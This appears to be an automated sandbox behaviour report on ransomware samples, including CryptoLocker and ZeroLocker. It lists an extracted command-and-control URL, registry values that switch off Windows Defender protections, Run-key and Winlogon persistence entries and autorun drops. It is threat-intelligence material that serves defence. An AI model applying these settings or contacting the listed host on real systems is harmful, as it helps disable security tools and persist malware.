Analysis
-
max time kernel
934s -
max time network
936s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
19/04/2025, 21:02
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Resource
win10ltsc2021-20250314-en
General
-
Target
https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Malware Config
Extracted
https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php
Extracted
C:\Users\Admin\Contacts\HELP_DECRYPT_YOUR_FILES.txt
Signatures
-
CryptoLocker
Ransomware family with multiple variants.
-
Cryptolocker family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1780 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5576 netsh.exe 4056 netsh.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation tmp2.exe Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 3 IoCs
description ioc Process File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\winlogon.exe taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Executes dropped EXE 64 IoCs
pid Process 4496 eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe 5360 eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe 3708 eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe 4280 66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe 3916 e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe 4024 winlogon.exe 4920 winlogon.exe 6212 d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe 7272 {34184A33-0407-212E-3320-09040709E2C2}.exe 6252 {34184A33-0407-212E-3320-09040709E2C2}.exe 7276 {34184A33-0407-212E-3320-09040709E2C2}.exe 7060 {34184A33-0407-212E-3320-09040709E2C2}.exe 7656 {34184A33-0407-212E-3320-09040709E2C2}.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 14420 d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe 15308 69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe 19832 a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe 19908 tmp1.jpg 19984 tmp2.exe 20104 drpbx.exe 20148 firefox.exe 20232 firefox.exe 20312 firefox.exe 20392 firefox.exe 20472 firefox.exe 20556 firefox.exe 20636 firefox.exe 20716 firefox.exe 20796 firefox.exe 20880 firefox.exe 20960 firefox.exe 21040 firefox.exe 21120 firefox.exe 21200 firefox.exe 21280 firefox.exe 21356 firefox.exe 21444 firefox.exe 10336 firefox.exe 10416 firefox.exe 10500 firefox.exe 10576 firefox.exe 10660 firefox.exe 10740 firefox.exe 10820 firefox.exe 21552 firefox.exe 21632 firefox.exe 21716 firefox.exe 21796 firefox.exe 21876 firefox.exe 21956 firefox.exe 22036 firefox.exe 22116 firefox.exe 22196 firefox.exe 22276 firefox.exe 22360 firefox.exe 22452 firefox.exe 22540 firefox.exe 22624 firefox.exe 22704 firefox.exe 22788 firefox.exe 22920 firefox.exe 23240 firefox.exe 23376 firefox.exe 23496 firefox.exe -
Loads dropped DLL 1 IoCs
pid Process 3212 msedge.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" tmp2.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe" d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" {34184A33-0407-212E-3320-09040709E2C2}.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" firefox.exe -
Drops desktop.ini file(s) 27 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Documents\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Downloads\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Videos\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Desktop\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Music\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Pictures\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File created C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Links\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Music\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Searches\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\Libraries\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Windows\assembly\Desktop.ini d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Documents\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Admin\Videos\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Users\Public\desktop.ini e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe -
Enumerates connected drives 3 TTPs 10 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\E: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\F: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 299 iplogger.com 300 iplogger.com -
Drops autorun.inf file 1 TTPs 3 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf cmd.exe File opened for modification C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf cmd.exe File opened for modification C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\autorun.inf cmd.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\Tsuchigumo.bat cmd.exe File opened for modification C:\Windows\system32\Tsuchigumo.bat cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe 5852 537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe -
Drops file in Program Files directory 64 IoCs
